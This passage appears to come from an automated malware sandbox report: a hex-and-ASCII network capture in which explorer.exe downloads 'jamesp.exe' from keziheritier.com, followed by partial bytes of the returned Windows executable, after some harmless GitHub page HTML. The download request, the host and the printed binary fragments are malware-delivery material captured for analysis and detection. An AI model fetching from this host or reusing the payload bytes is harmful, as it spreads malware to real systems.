                                                                                                                2022-10-13 11:08:11 UTC4068INData Raw: 75 6f 74 3b 7d 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 6b 69 6c 6c 73 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 22 3e 53 6b 69 6c 6c 73 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6c 68 2d 63 6f 6e 64 65 6e 73 65 64 20 6d 62 2d 33 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 63 6c 61 73 73 3d 22 4c 69 6e 6b 2d 2d 73 65 63 6f 6e 64 61 72 79 22 20 64 61 74 61 2d 61 6e 61 6c 79 74 69 63 73 2d 65 76 65 6e 74 3d 22 7b 26 71 75 6f 74 3b 63 61 74 65 67 6f 72 79 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 46 6f 6f 74 65 72 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 61 63 74 69 6f 6e 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 67 6f 20 74 6f 20 73 74 61 74 75 73 26 71 75 6f 74 3b 2c
                                                                                                                Data Ascii: uot;}" href="https://skills.github.com/">Skills</a> </li> <li class="lh-condensed mb-3"> <a class="Link--secondary" data-analytics-event="{&quot;category&quot;:&quot;Footer&quot;,&quot;action&quot;:&quot;go to status&quot;,
                                                                                                                2022-10-13 11:08:11 UTC4070INData Raw: 6e 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 67 6f 20 74 6f 20 62 6c 6f 67 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 6c 61 62 65 6c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 74 65 78 74 3a 62 6c 6f 67 26 71 75 6f 74 3b 7d 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 62 6c 6f 67 22 3e 42 6c 6f 67 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6c 68 2d 63 6f 6e 64 65 6e 73 65 64 20 6d 62 2d 33 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 63 6c 61 73 73 3d 22 4c 69 6e 6b 2d 2d 73 65 63 6f 6e 64 61 72 79 22 20 64 61 74 61 2d 61 6e 61 6c 79 74 69 63 73 2d 65 76 65 6e 74 3d 22 7b 26 71 75 6f 74 3b 63 61 74 65 67 6f 72 79 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b
                                                                                                                Data Ascii: n&quot;:&quot;go to blog&quot;,&quot;label&quot;:&quot;text:blog&quot;}" href="https://github.blog">Blog</a> </li> <li class="lh-condensed mb-3"> <a class="Link--secondary" data-analytics-event="{&quot;category&quot;:&quot;
                                                                                                                2022-10-13 11:08:11 UTC4071INData Raw: 6f 20 73 6f 63 69 61 6c 20 69 6d 70 61 63 74 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 6c 61 62 65 6c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 74 65 78 74 3a 73 6f 63 69 61 6c 20 69 6d 70 61 63 74 26 71 75 6f 74 3b 7d 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 6f 63 69 61 6c 69 6d 70 61 63 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 22 3e 53 6f 63 69 61 6c 20 49 6d 70 61 63 74 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6c 68 2d 63 6f 6e 64 65 6e 73 65 64 20 6d 62 2d 33 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 63 6c 61 73 73 3d 22 4c 69 6e 6b 2d 2d 73 65 63 6f 6e 64 61 72 79 22 20 64 61 74 61 2d 61 6e 61 6c 79 74 69 63 73 2d 65 76 65 6e 74 3d 22 7b 26 71 75 6f 74
                                                                                                                Data Ascii: o social impact&quot;,&quot;label&quot;:&quot;text:social impact&quot;}" href="https://socialimpact.github.com/">Social Impact</a> </li> <li class="lh-condensed mb-3"> <a class="Link--secondary" data-analytics-event="{&quot
                                                                                                                2022-10-13 11:08:11 UTC4072INData Raw: 74 3b 3a 26 71 75 6f 74 3b 46 6f 6f 74 65 72 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 61 63 74 69 6f 6e 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 67 6f 20 74 6f 20 46 61 63 65 62 6f 6f 6b 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 6c 61 62 65 6c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 74 65 78 74 3a 66 61 63 65 62 6f 6f 6b 26 71 75 6f 74 3b 7d 22 20 63 6c 61 73 73 3d 22 63 6f 6c 6f 72 2d 66 67 2d 73 75 62 74 6c 65 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 6d 6f 64 75 6c 65 73 2f 73 69 74 65 2f 69 63 6f 6e 73 2f 66 6f 6f 74 65 72 2f 66 61 63 65 62 6f 6f 6b 2e 73 76 67 22 20 77 69 64 74 68 3d 22 31 38 22 20 68 65 69 67
                                                                                                                Data Ascii: t;:&quot;Footer&quot;,&quot;action&quot;:&quot;go to Facebook&quot;,&quot;label&quot;:&quot;text:facebook&quot;}" class="color-fg-subtle"> <img src="https://github.githubassets.com/images/modules/site/icons/footer/facebook.svg" width="18" heig
                                                                                                                2022-10-13 11:08:11 UTC4073INData Raw: 3d 22 64 2d 62 6c 6f 63 6b 22 20 6c 6f 61 64 69 6e 67 3d 22 6c 61 7a 79 22 20 64 65 63 6f 64 69 6e 67 3d 22 61 73 79 6e 63 22 20 61 6c 74 3d 22 59 6f 75 54 75 62 65 20 69 63 6f 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 73 72 2d 6f 6e 6c 79 22 3e 47 69 74 48 75 62 20 6f 6e 20 59 6f 75 54 75 62 65 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6d 72 2d 33 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 77 69 74 63 68 2e 74 76 2f 67 69 74 68 75 62 22 20 64 61 74 61 2d 61 6e 61 6c 79 74 69 63 73 2d 65 76 65 6e 74 3d 22 7b 26 71 75 6f 74 3b
                                                                                                                Data Ascii: ="d-block" loading="lazy" decoding="async" alt="YouTube icon"> <span class="sr-only">GitHub on YouTube</span> </a> </li> <li class="mr-3"> <a href="https://www.twitch.tv/github" data-analytics-event="{&quot;
                                                                                                                2022-10-13 11:08:11 UTC4075INData Raw: 33 39 3b 73 20 6f 72 67 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 6c 61 62 65 6c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 74 65 78 74 3a 67 69 74 68 75 62 26 71 75 6f 74 3b 7d 22 20 63 6c 61 73 73 3d 22 63 6f 6c 6f 72 2d 66 67 2d 73 75 62 74 6c 65 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 6d 6f 64 75 6c 65 73 2f 73 69 74 65 2f 69 63 6f 6e 73 2f 66 6f 6f 74 65 72 2f 67 69 74 68 75 62 2d 6d 61 72 6b 2e 73 76 67 22 20 77 69 64 74 68 3d 22 32 30 22 20 68 65 69 67 68 74 3d 22 32 30 22 20 63 6c 61 73 73 3d 22 64 2d 62 6c 6f 63 6b 22 20 6c 6f 61 64 69 6e 67 3d 22 6c 61 7a 79 22 20 64 65 63 6f 64 69 6e 67 3d 22 61 73 79
                                                                                                                Data Ascii: 39;s org&quot;,&quot;label&quot;:&quot;text:github&quot;}" class="color-fg-subtle"> <img src="https://github.githubassets.com/images/modules/site/icons/footer/github-mark.svg" width="20" height="20" class="d-block" loading="lazy" decoding="asy
                                                                                                                2022-10-13 11:08:11 UTC4076INData Raw: 22 7b 26 71 75 6f 74 3b 63 61 74 65 67 6f 72 79 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 46 6f 6f 74 65 72 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 61 63 74 69 6f 6e 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 67 6f 20 74 6f 20 73 69 74 65 20 6d 61 70 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 6c 61 62 65 6c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 74 65 78 74 3a 73 69 74 65 20 6d 61 70 26 71 75 6f 74 3b 7d 22 20 68 72 65 66 3d 22 2f 73 69 74 65 2d 6d 61 70 22 3e 53 69 74 65 20 4d 61 70 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0a 0a 20 20 20 20 20 20 20 20 3c 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 61 20 63 6c 61 73 73 3d 22 4c 69 6e 6b 2d 2d 73 65 63 6f 6e 64 61 72 79 22 20 64 61 74 61 2d 61 6e 61 6c 79 74 69 63 73 2d 65 76 65 6e 74 3d 22 7b 26 71 75
                                                                                                                Data Ascii: "{&quot;category&quot;:&quot;Footer&quot;,&quot;action&quot;:&quot;go to site map&quot;,&quot;label&quot;:&quot;text:site map&quot;}" href="/site-map">Site Map</a> </li> <li> <a class="Link--secondary" data-analytics-event="{&qu
                                                                                                                2022-10-13 11:08:11 UTC4077INData Raw: 36 20 30 4c 38 20 36 2e 39 34 6c 33 2e 32 32 2d 33 2e 32 32 61 2e 37 35 2e 37 35 20 30 20 31 31 31 2e 30 36 20 31 2e 30 36 4c 39 2e 30 36 20 38 6c 33 2e 32 32 20 33 2e 32 32 61 2e 37 35 2e 37 35 20 30 20 31 31 2d 31 2e 30 36 20 31 2e 30 36 4c 38 20 39 2e 30 36 6c 2d 33 2e 32 32 20 33 2e 32 32 61 2e 37 35 2e 37 35 20 30 20 30 31 2d 31 2e 30 36 2d 31 2e 30 36 4c 36 2e 39 34 20 38 20 33 2e 37 32 20 34 2e 37 38 61 2e 37 35 2e 37 35 20 30 20 30 31 30 2d 31 2e 30 36 7a 22 3e 3c 2f 70 61 74 68 3e 0a 3c 2f 73 76 67 3e 0a 20 20 20 20 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 59 6f 75 20 63 61 6e e2 80 99 74 20 70 65 72 66 6f 72 6d 20 74 68 61 74 20 61 63 74 69 6f 6e 20 61 74 20 74 68 69 73 20 74 69 6d 65 2e 0a 20 20 3c 2f 64 69 76 3e 0a 0a 20 20 3c 64 69 76 20 63
                                                                                                                Data Ascii: 6 0L8 6.94l3.22-3.22a.75.75 0 111.06 1.06L9.06 8l3.22 3.22a.75.75 0 11-1.06 1.06L8 9.06l-3.22 3.22a.75.75 0 01-1.06-1.06L6.94 8 3.72 4.78a.75.75 0 010-1.06z"></path></svg> </button> You cant perform that action at this time. </div> <div c
                                                                                                                2022-10-13 11:08:11 UTC4079INData Raw: 64 65 74 61 69 6c 73 2d 64 69 61 6c 6f 67 20 63 6c 61 73 73 3d 22 42 6f 78 20 42 6f 78 2d 2d 6f 76 65 72 6c 61 79 20 64 2d 66 6c 65 78 20 66 6c 65 78 2d 63 6f 6c 75 6d 6e 20 61 6e 69 6d 2d 66 61 64 65 2d 69 6e 20 66 61 73 74 20 68 78 5f 72 73 6d 2d 64 69 61 6c 6f 67 20 68 78 5f 72 73 6d 2d 6d 6f 64 61 6c 22 3e 0a 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 63 6c 61 73 73 3d 22 42 6f 78 2d 62 74 6e 2d 6f 63 74 69 63 6f 6e 20 6d 2d 30 20 62 74 6e 2d 6f 63 74 69 63 6f 6e 20 70 6f 73 69 74 69 6f 6e 2d 61 62 73 6f 6c 75 74 65 20 72 69 67 68 74 2d 30 20 74 6f 70 2d 30 22 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 43 6c 6f 73 65 20 64 69 61 6c 6f 67 22 20 64 61 74 61 2d 63 6c 6f 73 65 2d 64 69 61 6c 6f 67 3e 0a 20 20 20 20 20
                                                                                                                Data Ascii: details-dialog class="Box Box--overlay d-flex flex-column anim-fade-in fast hx_rsm-dialog hx_rsm-modal"> <button class="Box-btn-octicon m-0 btn-octicon position-absolute right-0 top-0" type="button" aria-label="Close dialog" data-close-dialog>
                                                                                                                2022-10-13 11:08:11 UTC4080INData Raw: 20 31 36 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 77 69 64 74 68 3d 22 31 36 22 20 64 61 74 61 2d 76 69 65 77 2d 63 6f 6d 70 6f 6e 65 6e 74 3d 22 74 72 75 65 22 20 63 6c 61 73 73 3d 22 6f 63 74 69 63 6f 6e 20 6f 63 74 69 63 6f 6e 2d 63 6f 70 79 20 6a 73 2d 63 6c 69 70 62 6f 61 72 64 2d 63 6f 70 79 2d 69 63 6f 6e 20 6d 2d 32 22 3e 0a 20 20 20 20 3c 70 61 74 68 20 66 69 6c 6c 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20 64 3d 22 4d 30 20 36 2e 37 35 43 30 20 35 2e 37 38 34 2e 37 38 34 20 35 20 31 2e 37 35 20 35 68 31 2e 35 61 2e 37 35 2e 37 35 20 30 20 30 31 30 20 31 2e 35 68 2d 31 2e 35 61 2e 32 35 2e 32 35 20 30 20 30 30 2d 2e 32 35 2e 32 35 76 37 2e 35 63 30 20 2e 31 33 38 2e 31 31 32 2e 32 35 2e 32 35 2e 32 35 68 37 2e 35 61 2e 32 35 2e 32 35
                                                                                                                Data Ascii: 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-copy js-clipboard-copy-icon m-2"> <path fill-rule="evenodd" d="M0 6.75C0 5.784.784 5 1.75 5h1.5a.75.75 0 010 1.5h-1.5a.25.25 0 00-.25.25v7.5c0 .138.112.25.25.25h7.5a.25.25


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                6192.168.2.54973666.96.149.30443C:\Windows\explorer.exe
                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                2022-10-13 11:08:13 UTC4081OUTGET /jamesp.exe HTTP/1.1
                                                                                                                Connection: Keep-Alive
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                Host: keziheritier.com
                                                                                                                2022-10-13 11:08:14 UTC4081INHTTP/1.1 200 OK
                                                                                                                Date: Thu, 13 Oct 2022 11:08:13 GMT
                                                                                                                Content-Type: application/octet-stream
                                                                                                                Content-Length: 783360
                                                                                                                Connection: close
                                                                                                                Server: Apache/2
                                                                                                                Last-Modified: Thu, 13 Oct 2022 08:01:09 GMT
                                                                                                                Accept-Ranges: bytes
                                                                                                                Cache-Control: max-age=14400
                                                                                                                Etag: "bf400-5eae5e984aa48"
                                                                                                                Expires: Thu, 13 Oct 2022 13:36:01 GMT
                                                                                                                Age: 5532
                                                                                                                2022-10-13 11:08:14 UTC4082INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b4 c0 e6 8e f0 a1 88 dd f0 a1 88 dd f0 a1 88 dd e4 ca 8b dc e1 a1 88 dd e4 ca 8d dc 56 a1 88 dd e4 ca 8c dc e6 a1 88 dd e4 ca 89 dc f3 a1 88 dd f0 a1 89 dd a8 a1 88 dd 90 db 8c dc e1 a1 88 dd 90 db 8b dc e5 a1 88 dd 90 db 8d dc bb a1 88 dd 94 db 81 dc f1 a1 88 dd 94 db 8a dc f1 a1 88 dd 52 69 63 68 f0 a1 88 dd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$VRich
                                                                                                                2022-10-13 11:08:14 UTC4097INData Raw: 8b f9 b9 ff ff ff 7f 3b d9 77 61 8b 47 14 51 50 53 89 45 f8 e8 75 06 00 00 33 c9 8b f0 83 c0 01 0f 92 c1 f7 d9 0b c8 51 e8 31 02 00 00 8b c8 89 5f 10 0f be 45 10 53 50 51 89 4d fc 89 77 14 e8 5b e3 01 00 8b 75 fc 83 c4 1c 8b 4d f8 c6 04 1e 00 83 f9 10 72 0b 41 51 ff 37 e8 9d 01 00 00 59 59 89 37 8b c7 5f 5e 5b c9 c2 0c 00 e8 65 c8 ff ff cc 55 8b ec 83 ec 0c 8b 45 10 53 8b 5d 08 56 57 8b f9 89 45 fc b9 ff ff ff 7f 3b d9 77 5d 8b 47 14 51 50 53 89 45 f4 e8 f1 05 00 00 33 c9 8b f0 83 c0 01 0f 92 c1 f7 d9 0b c8 51 e8 ad 01 00 00 53 ff 75 fc 89 45 f8 50 89 5f 10 89 77 14 e8 db d7 01 00 8b 75 f8 83 c4 1c 8b 4d f4 c6 04 1e 00 83 f9 10 72 0b 41 51 ff 37 e8 1d 01 00 00 59 59 89 37 8b c7 5f 5e 5b c9 c2 0c 00 e8 e5 c7 ff ff cc 55 8b ec 83 ec 14 8b 45 10 8b 55 08 53
                                                                                                                Data Ascii: ;waGQPSEu3Q1_ESPQMw[uMrAQ7YY7_^[eUES]VWE;w]GQPSE3QSuEP_wuMrAQ7YY7_^[UEUS
                                                                                                                2022-10-13 11:08:14 UTC4113INData Raw: 7d 97 00 74 48 80 7d 95 00 75 0d 8b cb e8 fe 0b 00 00 8b 55 cc 8b 4d b8 8a 43 05 3a 45 97 75 2d 6a 00 8d 4d b8 e8 65 de ff ff 47 8b cb e8 63 07 00 00 ff b5 74 ff ff ff 8b cb e8 0d 16 00 00 84 c0 0f 84 0f ff ff ff 8b 55 cc 8b 4d b8 85 ff 74 19 8d 45 b8 83 fa 10 72 02 8b c1 80 3c 38 00 7e 37 47 eb 06 8b 55 cc 8b 4d b8 8b 85 7c ff ff ff 85 ff 74 28 8a 00 3c 7f 74 22 83 ef 01 74 34 8d 5d b8 89 5d 88 83 fa 10 72 03 89 4d 88 8b 5d 88 3a 04 3b 8b 5d 80 74 37 c6 45 96 01 8d 4d b8 c6 45 fc 01 e8 e6 a8 ff ff 8b bd 74 ff ff ff e9 af 00 00 00 85 ff 75 18 8d 5d b8 89 5d 88 83 fa 10 72 03 89 4d 88 8b 5d 88 3a 03 8b 5d 80 7c c9 8b 85 7c ff ff ff 40 80 38 00 7e 8f 89 85 7c ff ff ff eb 8d 57 8b cb e8 61 15 00 00 84 c0 75 73 80 7b 04 00 75 07 8b cb e8 14 0b 00 00 8a 43 05
                                                                                                                Data Ascii: }tH}uUMC:Eu-jMeGctUMtEr<8~7GUM|t(<t"t4]]rM]:;]t7EMEtu]]rM]:]||@8~|Waus{uC
                                                                                                                2022-10-13 11:08:14 UTC4129INData Raw: 01 00 6a 00 8d 4d ec e8 88 88 ff ff 8b 35 84 c4 4b 00 b9 20 c4 4b 00 83 65 fc 00 89 75 f0 e8 1d 4f ff ff 8b 4d 08 50 e8 dc 4f ff ff 8b f8 85 ff 75 43 85 f6 74 04 8b fe eb 3b ff 75 08 8d 45 f0 50 e8 84 2b 00 00 59 59 83 f8 ff 74 38 8b 7d f0 89 7d f0 57 c6 45 fc 01 e8 f6 a8 ff ff 8b 07 59 8b 70 04 8b ce ff 15 64 31 47 00 8b cf ff d6 89 3d 84 c4 4b 00 8d 4d ec e8 7e 88 ff ff 8b c7 e8 cf 41 01 00 c3 e8 d0 4c ff ff cc 6a 08 b8 a2 03 47 00 e8 ee 41 01 00 6a 00 8d 4d ec e8 f3 87 ff ff 8b 35 50 c4 4b 00 b9 f8 c3 4b 00 83 65 fc 00 89 75 f0 e8 88 4e ff ff 8b 4d 08 50 e8 47 4f ff ff 8b f8 85 ff 75 43 85 f6 74 04 8b fe eb 3b ff 75 08 8d 45 f0 50 e8 5b 2b 00 00 59 59 83 f8 ff 74 38 8b 7d f0 89 7d f0 57 c6 45 fc 01 e8 61 a8 ff ff 8b 07 59 8b 70 04 8b ce ff 15 64 31 47
                                                                                                                Data Ascii: jM5K KeuOMPOuCt;uEP+YYt8}}WEYpd1G=KM~ALjGAjM5PKKeuNMPGOuCt;uEP[+YYt8}}WEaYpd1G
                                                                                                                2022-10-13 11:08:14 UTC4145INData Raw: 22 83 7d b0 10 8d 55 9c 89 95 74 ff ff ff 72 06 89 8d 74 ff ff ff 8b 95 74 ff ff ff 3a 02 8b 55 b0 7c bf 8b 85 60 ff ff ff 40 80 38 00 0f 8e 72 ff ff ff 89 85 60 ff ff ff e9 6d ff ff ff 56 8b cb e8 a3 a7 00 00 84 c0 0f 85 86 00 00 00 80 7b 04 00 75 07 8b cb e8 ae 45 00 00 66 8b 43 06 66 89 85 7c ff ff ff 8d 85 7c ff ff ff 50 8d 45 ec 50 8d 45 b4 50 e8 6e 9c ff ff 8d 4d b4 83 c4 0c 2b c1 d1 f8 83 f8 16 73 45 8b 8d 70 ff ff ff 39 8d 68 ff ff ff 7f 08 ff 85 78 ff ff ff eb 18 85 c0 75 04 85 c9 74 10 8a 80 f0 4e 47 00 88 07 47 41 89 8d 70 ff ff ff 8b cb c6 45 83 01 e8 ce 2f 00 00 56 8b cb e8 1f a7 00 00 84 c0 74 80 89 bd 5c ff ff ff 80 7d 83 00 74 13 83 bd 70 ff ff ff 00 75 0a c6 07 30 47 89 bd 5c ff ff ff 56 8b cb e8 f4 a6 00 00 84 c0 75 3f 38 43 04 75 07 8b
                                                                                                                Data Ascii: "}Utrtt:U|`@8r`mV{uEfCf||PEPEPnM+sEp9hxutNGGApE/Vt\}tpu0G\Vu?8Cu
                                                                                                                2022-10-13 11:08:14 UTC4161INData Raw: 47 ff ff 83 c4 10 e8 48 c2 00 00 c3 6a 0c b8 b6 13 47 00 e8 6d c2 00 00 8b 45 0c 33 db 8b 7d 14 8b c8 83 e1 02 89 4d ec 74 62 b9 24 c3 4b 00 e8 0c cf fe ff 85 ff 75 3c 6a 44 89 45 f0 e8 29 be 00 00 8b f0 89 75 e8 59 85 f6 74 15 ff 75 08 8b ce 89 5e 04 c7 06 84 49 47 00 e8 b8 f2 ff ff eb 02 8b f3 ff 75 f0 56 ff 75 10 e8 4a 47 ff ff 83 c4 0c eb 15 57 8b f0 e8 95 75 ff ff 56 50 ff 75 10 e8 33 47 ff ff 83 c4 10 8b 45 0c a8 08 0f 84 f8 00 00 00 b9 d4 c3 4b 00 e8 a2 ce fe ff 89 45 f0 85 ff 75 1e 6a 08 e8 bf bd 00 00 89 45 e8 59 85 c0 74 0b 89 58 04 c7 00 48 4a 47 00 eb 0b 8b c3 eb 07 57 e8 44 7c ff ff 59 ff 75 f0 8b 75 10 50 56 e8 e2 46 ff ff 83 c4 0c b9 d8 c3 4b 00 e8 5c ce fe ff 89 45 f0 85 ff 75 1e 6a 08 e8 79 bd 00 00 89 45 e8 59 85 c0 74 0b 89 58 04 c7 00
                                                                                                                Data Ascii: GHjGmE3}Mtb$Ku<jDE)uYtu^IGuVuJGWuVPu3GEKEujEYtXHJGWD|YuuPVFK\EujyEYtX
                                                                                                                2022-10-13 11:08:14 UTC4177INData Raw: 75 10 ff 75 0c 50 e8 6e 29 00 00 6a 02 5e 8b 08 8b 40 04 89 75 ec eb 79 8b 75 ec 83 fe 02 75 28 8b 75 24 8d 45 14 53 83 c6 10 56 6a 0c 6a 01 50 8d 45 0c 50 ff 75 f0 e8 d7 97 ff ff 09 07 83 c4 1c ff 0e e9 81 00 00 00 8b 45 24 83 fe 01 75 1f 53 83 c0 0c 50 6a 1f 56 8d 45 14 50 8d 45 0c 50 ff 75 f0 e8 ab 97 ff ff 83 c4 1c 09 07 eb 5a 8b 4d f0 50 57 ff 75 1c 8d 45 e0 ff 75 18 ff 75 14 ff 75 10 ff 75 0c 50 e8 cd 29 00 00 8b 08 8b 40 04 89 45 10 89 4d 0c eb 30 80 7d 10 00 75 08 8d 4d 0c e8 90 c5 ff ff 8b 03 ff 75 12 6a 48 8b 70 10 8b ce ff 15 64 31 47 00 8b cb ff d6 84 c0 74 18 8d 4d 0c e8 ed af ff ff 8d 45 14 50 8d 4d 0c e8 4e 27 00 00 84 c0 74 c0 8d 45 14 50 8d 4d 0c e8 3e 27 00 00 84 c0 75 61 38 45 10 75 08 8d 4d 0c e8 41 c5 ff ff 8b 03 6a 00 ff 75 12 8b 70
                                                                                                                Data Ascii: uuPn)j^@uyuu(u$ESVjjPEPuE$uSPjVEPEPuZMPWuEuuuuP)@EM0}uMujHpd1GtMEPMN'tEPM>'ua8EuMAjup
                                                                                                                2022-10-13 11:08:14 UTC4193INData Raw: 0c e8 ea 4f fe ff 50 8d 4d b8 e8 ad 4d fe ff 83 66 04 00 43 89 5d f0 53 50 8b ce c7 45 fc 02 00 00 00 c7 06 4c 50 47 00 88 5e 28 e8 10 0f 00 00 c7 06 b4 50 47 00 eb 02 33 f6 89 37 f6 c3 01 74 08 8d 4d b8 e8 e0 4d fe ff 6a 03 58 e8 02 42 00 00 c3 6a 3c b8 cc 20 47 00 e8 27 42 00 00 8b 7d 08 33 db 89 5d f0 85 ff 74 64 39 1f 75 60 6a 58 e8 f6 3d 00 00 8b f0 59 89 75 ec 21 5d fc 85 f6 74 3b 8b 4d 0c e8 66 4f fe ff 50 8d 4d b8 e8 29 4d fe ff 83 66 04 00 43 89 5d f0 53 50 8b ce c7 45 fc 02 00 00 00 c7 06 4c 50 47 00 c6 46 28 00 e8 8b 0e 00 00 c7 06 80 50 47 00 eb 02 33 f6 89 37 f6 c3 01 74 08 8d 4d b8 e8 5b 4d fe ff 6a 03 58 e8 7d 41 00 00 c3 6a 3c b8 14 21 47 00 e8 a2 41 00 00 8b 7d 08 33 f6 8b de 89 5d f0 85 ff 74 49 39 37 75 45 6a 44 e8 6f 3d 00 00 59 89 45
                                                                                                                Data Ascii: OPMMfC]SPELPG^(PG37tMMjXBj< G'B}3]td9u`jX=Yu!]t;MfOPM)MfC]SPELPGF(PG37tM[MjX}Aj<!GA}3]tI97uEjDo=YE
                                                                                                                2022-10-13 11:08:14 UTC4209INData Raw: 01 75 13 ff 75 10 8b 4d 14 50 ff 75 08 ff 15 64 31 47 00 ff 55 14 ff 75 1c ff 75 18 e8 77 d7 02 00 59 59 5d c3 e8 9e 0e 00 00 85 c0 74 0c 68 dc c4 4b 00 e8 da 17 03 00 59 c3 e8 31 ef 02 00 85 c0 0f 84 04 ef 02 00 c3 6a 00 e8 25 1a 03 00 59 e9 d4 54 00 00 55 8b ec 83 7d 08 00 75 07 c6 05 d8 c4 4b 00 01 e8 8a 0c 00 00 e8 6e 54 00 00 84 c0 75 04 32 c0 5d c3 e8 a3 19 03 00 84 c0 75 0a 6a 00 e8 8b 54 00 00 59 eb e9 b0 01 5d c3 55 8b ec 80 3d d9 c4 4b 00 00 74 04 b0 01 5d c3 56 8b 75 08 85 f6 74 05 83 fe 01 75 62 e8 18 0e 00 00 85 c0 74 26 85 f6 75 22 68 dc c4 4b 00 e8 7d 17 03 00 59 85 c0 75 0f 68 e8 c4 4b 00 e8 6e 17 03 00 59 85 c0 74 2b 32 c0 eb 30 83 c9 ff 89 0d dc c4 4b 00 89 0d e0 c4 4b 00 89 0d e4 c4 4b 00 89 0d e8 c4 4b 00 89 0d ec c4 4b 00 89 0d f0 c4
                                                                                                                Data Ascii: uuMPud1GUuuwYY]thKY1j%YTU}uKnTu2]ujTY]U=Kt]Vutubt&u"hK}YuhKnYt+20KKKKK
